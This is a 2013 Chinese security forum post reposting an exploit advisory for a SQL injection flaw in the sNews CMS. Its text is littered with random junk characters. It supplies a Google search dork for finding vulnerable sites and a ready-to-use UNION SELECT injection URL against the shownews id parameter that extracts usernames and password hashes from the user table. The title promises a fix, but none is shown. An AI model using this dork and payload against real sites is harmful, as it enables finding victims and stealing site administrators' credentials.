找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2010|回复: 0
打印 上一主题 下一主题

CMS snews SQL注射及修复

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-23 08:55:06 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
标题: CMS snews SQL Injection Vulnerability
3 H( X$ S0 ^. D7 n7 J4 w9 Z作者: By onestree
' V1 `( K) \& s5 f( Y! C3 `0 S( L下载地址 : http://snewscms.com/7 {6 z- x& C* q4 c! G! u; `
测试平台 : ubuntu 12.10 / win 7
+ o) [) _, X) I; R7 h关键词: inurl:"tanyakan pada rumput yang bergoyang"; s2 Q5 v8 F9 R3 p- q( V7 P
- v( M( k$ a9 c/ V

( ?# z9 b) ^/ `) e*************************************************************
. E+ w2 L- S9 Z, V
$ z6 d7 Y! W2 _  ~" LSQL poc:: y' O$ u5 ~  z( e7 o  ^3 f6 g% ^

  L; U' Y% T) hhttp://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]
" v4 y4 z1 c' K, v2 I5 m
7 [3 ]$ O2 S: [. i6 a3 x示例8 Y, y, V3 V  s$ C9 ]- W
. E- r- n& H4 ]
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*0 C# X$ i, G9 s1 H& Z$ Y

8 `+ S4 \- }( N$ a * z. I# W% R" Q, j* i( \
致谢:
% Y2 v" F# O' Z/ |6 z9 _; k6 V+ Y" H 6 p- N. W* V1 `5 {3 u
  Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
) R$ a$ q, `  T9 Q7 J: F9 D     
% D# F- H, a" b, \2 I          indonesiancoder - moeslimh4x0r - go-coder
9 Z- b: x" B6 R2 b9 E ' z7 P0 ]7 x% y+ a; E
spesial my hunny :*
5 g$ N, z5 i; x; l* ^! I8 G2 v3 _
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表